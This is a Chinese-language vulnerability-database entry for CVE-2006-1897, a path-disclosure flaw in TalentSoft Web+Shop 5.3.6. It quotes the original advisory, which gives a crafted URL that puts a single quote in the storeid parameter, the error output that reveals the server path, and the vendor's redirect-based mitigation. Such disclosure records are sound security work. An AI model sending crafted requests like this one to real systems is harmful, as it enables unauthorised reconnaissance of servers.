Webplus Web+Shop 信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195297 漏洞类型 未知
发布时间 2006-04-20 更新时间 2006-04-20
CVE编号 CVE-2006-1897 CNNVD-ID CNNVD-200604-352
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/87661
https://cxsecurity.com/issue/WLB-2006040036
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-352
|漏洞详情
当不为"未发现脚本"配置重定向URL时,Webplus(即talentsoft)Web+Shop5.3.6允许远程攻击者借助于单引号(')或webplus.exe中的store.wml中的storeid参数中可能无效值获取敏感信息。该漏洞在错误信息"未发现脚本"中泄漏了路径信息。
|漏洞EXP
TalentSoft Web+Shop Path Disclosure

Software: Web+Shop
Version: 5.3.6
Website: http://www.webplus.com
Bug: path disclosure
Exploitation: Remote

Description:
Web+Shop is a user-friendly e-commerce shopping cart application for the web.

Vulnerability:
Web+Shop installation path can be disclosed by sending a specially crafted URL.

Example:
http://host/cgi-bin/webplus.exe?script=/webpshop/store.wml&storeid='

which returns:

Web+ Error Message:

Error Code = 10220: Script file error. Occurred in WebInclude around line(169) in Script File

C:webplusscriptwebpshopscriptinitial.wml
Explanation:

The script file could not be executed because it could not be found or is corrupt..
Troubleshooting Information

Check the logical and physical paths for 'C:Inetpubwwwrootwebpshopstore_'templatesfpheader.wml' and make sure that it is in the right directory. Also verify the file's integrity.

Solution:
Quote from the vendor's replay:
 
"Path Disclosure Issue: We are constantly working on improving the security of our products. Our next build of Web+ 6.0 will have a configuration that will allow administrators to disable the display of file and path information from its error messages. Currently all other server information can be turned on and off using the Web+ Server Manager.
 
One thing to note that may help with your particular issue is this: Web+ has a security feature where an administrator can configure which URL Web+ should redirect to if an error 10220 (Script File Error) is encountered. To configure this, go to the Web+ Server Manager (http://host/cgi-bin/webplus.exe?script=/admin/admin.wml). The password needed is the one configured when Web+ was installed.
 
Click on Logging/Debugging and enter the desired "error" URL in the field, 'Redirect URL for "Script Not Found" Error:'. Then click Apply.
 
After this is set, any error 10220 will automatically redirect to this target URL. This may eliminate the particular path disclosure issue you identified."

Credit:
Discovered by Revnic Vasile
revnic (at) gmail (dot) com [email concealed]
|受影响的产品
TalentSoft Web%2B Shop 5.3.6
|参考资料

来源:OSVDB
名称:24621
链接:http://www.osvdb.org/24621
来源:BUGTRAQ
名称:20060413TalentSoftWeb+ShopPathDisclosure
链接:http://www.securityfocus.com/archive/1/archive/1/430880/100/0/threaded
来源:SECUNIA
名称:19662
链接:http://secunia.com/advisories/19662
来源:XF
名称:webplusshop-webplus-path-disclosure(25802)
链接:http://xforce.iss.net/xforce/xfdb/25802
来源:SREASON
名称:761
链接:http://securityreason.com/securityalert/761
来源:SREASON
名称:703
链接:http://securityreason.com/securityalert/703